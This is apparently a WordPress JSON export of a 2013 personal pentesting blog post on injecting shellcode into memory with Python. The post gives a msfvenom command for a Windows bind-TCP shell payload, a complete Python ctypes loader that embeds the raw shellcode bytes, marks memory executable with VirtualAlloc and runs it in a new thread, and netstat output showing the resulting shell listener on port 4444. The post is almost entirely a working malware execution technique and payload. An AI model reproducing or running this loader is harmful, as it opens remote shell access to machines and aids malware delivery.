{"id":997,"date":"2013-02-27T21:21:25","date_gmt":"2013-02-27T21:21:25","guid":{"rendered":"https:\/\/www.phillips321.co.uk:443\/?p=997"},"modified":"2013-02-27T21:21:25","modified_gmt":"2013-02-27T21:21:25","slug":"injecting-shell-code-into-memory-using-python","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2013\/02\/27\/injecting-shell-code-into-memory-using-python\/","title":{"rendered":"Injecting shell code into memory using python"},"content":{"rendered":"

So after using csharp to inject shellcode<\/a> I wanted to see what other languages were able to directly write to and call memory locations.<\/p>\n

As I’ve been working my way through The SecurityTube Python Scripting Expert<\/a> course I decided it made sense to see if it was possible with python.<\/p>\n

A quick google<\/a> found me a href=”http:\/\/www.debasish.in\/2012\/04\/execute-shellcode-using-python.html” target=”_blank”>this post<\/a> by Debasish<\/a>. FULL credit for this work goes to Debasish, this post is purely for my notes and memory. \ud83d\ude42<\/p>\n

So the first thing we need to do is create a payload for the exploit, a simple shell bind TCP will suffice:<\/p>\n

1
<\/div><\/td>
root@bt:~# msfvenom -p windows\/shell\/bind_tcp -e none<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Insert the code into the short python script and then run it, pretty simple really:<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<\/div><\/td>
#!\/usr\/bin\/python<\/span>
\nimport<\/span> ctypes
\n#ShellCode<\/span>
\n# msfvenom -p windows\/shell\/bind_tcp -e none<\/span>
\nshellcode =<\/span> bytearray<\/span>(<\/span>
\n"\\x<\/span>fc\\x<\/span>e8\\x<\/span>89\\x<\/span>00\\x<\/span>00\\x<\/span>00\\x<\/span>60\\x<\/span>89\\x<\/span>e5\\x<\/span>31\\x<\/span>d2\\x<\/span>64\\x<\/span>8b\\x<\/span>52"<\/span>
\n"\\x<\/span>30\\x<\/span>8b\\x<\/span>52\\x<\/span>0c\\x<\/span>8b\\x<\/span>52\\x<\/span>14\\x<\/span>8b\\x<\/span>72\\x<\/span>28\\x<\/span>0f\\x<\/span>b7\\x<\/span>4a\\x<\/span>26"<\/span>
\n"\\x<\/span>31\\x<\/span>ff\\x<\/span>31\\x<\/span>c0\\x<\/span>ac\\x<\/span>3c\\x<\/span>61\\x<\/span>7c\\x<\/span>02\\x<\/span>2c\\x<\/span>20\\x<\/span>c1\\x<\/span>cf\\x<\/span>0d"<\/span>
\n"\\x<\/span>01\\x<\/span>c7\\x<\/span>e2\\x<\/span>f0\\x<\/span>52\\x<\/span>57\\x<\/span>8b\\x<\/span>52\\x<\/span>10\\x<\/span>8b\\x<\/span>42\\x<\/span>3c\\x<\/span>01\\x<\/span>d0"<\/span>
\n"\\x<\/span>8b\\x<\/span>40\\x<\/span>78\\x<\/span>85\\x<\/span>c0\\x<\/span>74\\x<\/span>4a\\x<\/span>01\\x<\/span>d0\\x<\/span>50\\x<\/span>8b\\x<\/span>48\\x<\/span>18\\x<\/span>8b"<\/span>
\n"\\x<\/span>58\\x<\/span>20\\x<\/span>01\\x<\/span>d3\\x<\/span>e3\\x<\/span>3c\\x<\/span>49\\x<\/span>8b\\x<\/span>34\\x<\/span>8b\\x<\/span>01\\x<\/span>d6\\x<\/span>31\\x<\/span>ff"<\/span>
\n"\\x<\/span>31\\x<\/span>c0\\x<\/span>ac\\x<\/span>c1\\x<\/span>cf\\x<\/span>0d\\x<\/span>01\\x<\/span>c7\\x<\/span>38\\x<\/span>e0\\x<\/span>75\\x<\/span>f4\\x<\/span>03\\x<\/span>7d"<\/span>
\n"\\x<\/span>f8\\x<\/span>3b\\x<\/span>7d\\x<\/span>24\\x<\/span>75\\x<\/span>e2\\x<\/span>58\\x<\/span>8b\\x<\/span>58\\x<\/span>24\\x<\/span>01\\x<\/span>d3\\x<\/span>66\\x<\/span>8b"<\/span>
\n"\\x<\/span>0c\\x<\/span>4b\\x<\/span>8b\\x<\/span>58\\x<\/span>1c\\x<\/span>01\\x<\/span>d3\\x<\/span>8b\\x<\/span>04\\x<\/span>8b\\x<\/span>01\\x<\/span>d0\\x<\/span>89\\x<\/span>44"<\/span>
\n"\\x<\/span>24\\x<\/span>24\\x<\/span>5b\\x<\/span>5b\\x<\/span>61\\x<\/span>59\\x<\/span>5a\\x<\/span>51\\x<\/span>ff\\x<\/span>e0\\x<\/span>58\\x<\/span>5f\\x<\/span>5a\\x<\/span>8b"<\/span>
\n"\\x<\/span>12\\x<\/span>eb\\x<\/span>86\\x<\/span>5d\\x<\/span>68\\x<\/span>33\\x<\/span>32\\x<\/span>00\\x<\/span>00\\x<\/span>68\\x<\/span>77\\x<\/span>73\\x<\/span>32\\x<\/span>5f"<\/span>
\n"\\x<\/span>54\\x<\/span>68\\x<\/span>4c\\x<\/span>77\\x<\/span>26\\x<\/span>07\\x<\/span>ff\\x<\/span>d5\\x<\/span>b8\\x<\/span>90\\x<\/span>01\\x<\/span>00\\x<\/span>00\\x<\/span>29"<\/span>
\n"\\x<\/span>c4\\x<\/span>54\\x<\/span>50\\x<\/span>68\\x<\/span>29\\x<\/span>80\\x<\/span>6b\\x<\/span>00\\x<\/span>ff\\x<\/span>d5\\x<\/span>50\\x<\/span>50\\x<\/span>50\\x<\/span>50"<\/span>
\n"\\x<\/span>40\\x<\/span>50\\x<\/span>40\\x<\/span>50\\x<\/span>68\\x<\/span>ea\\x<\/span>0f\\x<\/span>df\\x<\/span>e0\\x<\/span>ff\\x<\/span>d5\\x<\/span>97\\x<\/span>31\\x<\/span>db"<\/span>
\n"\\x<\/span>53\\x<\/span>68\\x<\/span>02\\x<\/span>00\\x<\/span>11\\x<\/span>5c\\x<\/span>89\\x<\/span>e6\\x<\/span>6a\\x<\/span>10\\x<\/span>56\\x<\/span>57\\x<\/span>68\\x<\/span>c2"<\/span>
\n"\\x<\/span>db\\x<\/span>37\\x<\/span>67\\x<\/span>ff\\x<\/span>d5\\x<\/span>53\\x<\/span>57\\x<\/span>68\\x<\/span>b7\\x<\/span>e9\\x<\/span>38\\x<\/span>ff\\x<\/span>ff\\x<\/span>d5"<\/span>
\n"\\x<\/span>53\\x<\/span>53\\x<\/span>57\\x<\/span>68\\x<\/span>74\\x<\/span>ec\\x<\/span>3b\\x<\/span>e1\\x<\/span>ff\\x<\/span>d5\\x<\/span>57\\x<\/span>97\\x<\/span>68\\x<\/span>75"<\/span>
\n"\\x<\/span>6e\\x<\/span>4d\\x<\/span>61\\x<\/span>ff\\x<\/span>d5\\x<\/span>6a\\x<\/span>00\\x<\/span>6a\\x<\/span>04\\x<\/span>56\\x<\/span>57\\x<\/span>68\\x<\/span>02\\x<\/span>d9"<\/span>
\n"\\x<\/span>c8\\x<\/span>5f\\x<\/span>ff\\x<\/span>d5\\x<\/span>8b\\x<\/span>36\\x<\/span>6a\\x<\/span>40\\x<\/span>68\\x<\/span>00\\x<\/span>10\\x<\/span>00\\x<\/span>00\\x<\/span>56"<\/span>
\n"\\x<\/span>6a\\x<\/span>00\\x<\/span>68\\x<\/span>58\\x<\/span>a4\\x<\/span>53\\x<\/span>e5\\x<\/span>ff\\x<\/span>d5\\x<\/span>93\\x<\/span>53\\x<\/span>6a\\x<\/span>00\\x<\/span>56"<\/span>
\n"\\x<\/span>53\\x<\/span>57\\x<\/span>68\\x<\/span>02\\x<\/span>d9\\x<\/span>c8\\x<\/span>5f\\x<\/span>ff\\x<\/span>d5\\x<\/span>01\\x<\/span>c3\\x<\/span>29\\x<\/span>c6\\x<\/span>85"<\/span>
\n"\\x<\/span>f6\\x<\/span>75\\x<\/span>ec\\x<\/span>c3"<\/span>)<\/span>
\n 
\nptr =<\/span> ctypes.windll<\/span>.kernel32<\/span>.VirtualAlloc<\/span>(<\/span>ctypes.c_int<\/span>(<\/span>0<\/span>)<\/span>,<\/span>ctypes.c_int<\/span>(<\/span>len<\/span>(<\/span>shellcode)<\/span>)<\/span>,<\/span>ctypes.c_int<\/span>(<\/span>0x3000<\/span>)<\/span>,<\/span>ctypes.c_int<\/span>(<\/span>0x40<\/span>)<\/span>)<\/span>
\n 
\nbuf =<\/span> (<\/span>ctypes.c_char<\/span> * len<\/span>(<\/span>shellcode)<\/span>)<\/span>.from_buffer<\/span>(<\/span>shellcode)<\/span>
\n 
\nctypes.windll<\/span>.kernel32<\/span>.RtlMoveMemory<\/span>(<\/span>ctypes.c_int<\/span>(<\/span>ptr)<\/span>,<\/span>buf,<\/span>ctypes.c_int<\/span>(<\/span>len<\/span>(<\/span>shellcode)<\/span>)<\/span>)<\/span>
\n 
\nht =<\/span> ctypes.windll<\/span>.kernel32<\/span>.CreateThread<\/span>(<\/span>ctypes.c_int<\/span>(<\/span>0<\/span>)<\/span>,<\/span>ctypes.c_int<\/span>(<\/span>0<\/span>)<\/span>,<\/span>ctypes.c_int<\/span>(<\/span>ptr)<\/span>,<\/span>ctypes.c_int<\/span>(<\/span>0<\/span>)<\/span>,<\/span>ctypes.c_int<\/span>(<\/span>0<\/span>)<\/span>,<\/span> ctypes.pointer<\/span>(<\/span>ctypes.c_int<\/span>(<\/span>0<\/span>)<\/span>)<\/span>)<\/span>
\n 
\nctypes.windll<\/span>.kernel32<\/span>.WaitForSingleObject<\/span>(<\/span>ctypes.c_int<\/span>(<\/span>ht)<\/span>,<\/span>ctypes.c_int<\/span>(<\/span>-1<\/span>)<\/span>)<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
1
2
3
4
5
6
7
8
<\/div><\/td>
C:\\Users\\pentest>netstat -anp tcp
\nActive Connections
\n  Proto  Local Address          Foreign Address        State
\n  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
\n  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
\n  TCP    0.0.0.0:902            0.0.0.0:0              LISTENING
\n  TCP    0.0.0.0:912            0.0.0.0:0              LISTENING
\n  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"

So after using csharp to inject shellcode I wanted to see what other languages were able to directly write to and call memory locations. As I’ve been working my way through The SecurityTube Python Scripting Expert course I decided it made sense to see if it was possible with python. A quick google found me […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[363,362,349,111,361,113],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/997"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=997"}],"version-history":[{"count":8,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/997\/revisions"}],"predecessor-version":[{"id":1005,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/997\/revisions\/1005"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=997"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=997"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=997"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}